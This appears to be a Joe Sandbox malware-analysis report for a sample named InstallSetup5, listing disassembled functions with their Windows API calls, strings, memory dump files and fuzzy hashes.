Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,00426903,762323A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,00426903,762323A0), ref: 004067B8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Uniqueness

Uniqueness Score: -1.00%

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857
C:\Users\user\AppData\Local\Temp\, xrefs: 00406806

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-826357637
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(0028C520,00000064,0028C524), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

